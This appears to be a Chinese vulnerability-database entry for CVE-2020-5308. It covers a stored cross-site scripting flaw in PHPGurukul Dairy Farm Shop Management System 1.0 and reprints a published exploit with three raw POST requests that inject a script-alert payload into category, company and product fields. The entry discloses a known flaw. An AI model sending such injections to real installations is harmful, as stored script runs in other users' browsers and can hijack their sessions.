Dairy Farm Shop Management System 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1888117 漏洞类型 跨站脚本
发布时间 2020-01-08 更新时间 2020-01-17
CVE编号 CVE-2020-5308 CNNVD-ID CNNVD-202001-216
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2020010059
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202001-216
|漏洞详情
PHPGurukul Dairy Farm Shop Management System是一套基于PHP和MySQL的奶牛场管理系统。 PHPGurukul Dairy Farm Shop Management System 1.0版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
|漏洞EXP
# Exploit Title: Dairy Farm Shop Management System v1.0 - Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-01-03
# Exploit Author: Chris Inzinga
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
# Version: v1.0
# Tested on: Windows
# CVE: CVE-2020-5308

================ 1. - Cross Site Scripting (Persistent) ================

URL: http://192.168.0.33/dfsms/add-category.php
Method: POST
Parameter(s): 'category' & 'categorycode'
Payload: <script>alert(1)</script>

POST /dfsms/add-category.php HTTP/1.1
Host: 192.168.0.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.33/dfsms/add-category.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Connection: close
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
Upgrade-Insecure-Requests: 1

category=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&categorycode=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=



================ 2. - Cross Site Scripting (Persistent) ================

URL: http://192.168.0.33/dfsms/add-company.php
Method: POST
Parameter(s): 'companyname'
Payload: <script>alert(1)</script>

POST /dfsms/add-company.php HTTP/1.1
Host: 192.168.0.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.33/dfsms/add-company.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Connection: close
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
Upgrade-Insecure-Requests: 1

companyname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=



================ 3. - Cross Site Scripting (Persistent) ================

URL: http://192.168.0.33/dfsms/add-product.php
Method: POST
Parameter(s): 'productname'
Payload: <script>alert(1)</script>

POST /dfsms/add-product.php HTTP/1.1
Host: 192.168.0.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.33/dfsms/add-product.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Connection: close
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
Upgrade-Insecure-Requests: 1

category=test&company=test&productname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&productprice=1&submit=



|参考资料

来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/155861/Dairy-Farm-Shop-Management-System-1.0-Cross-Site-Scripting.html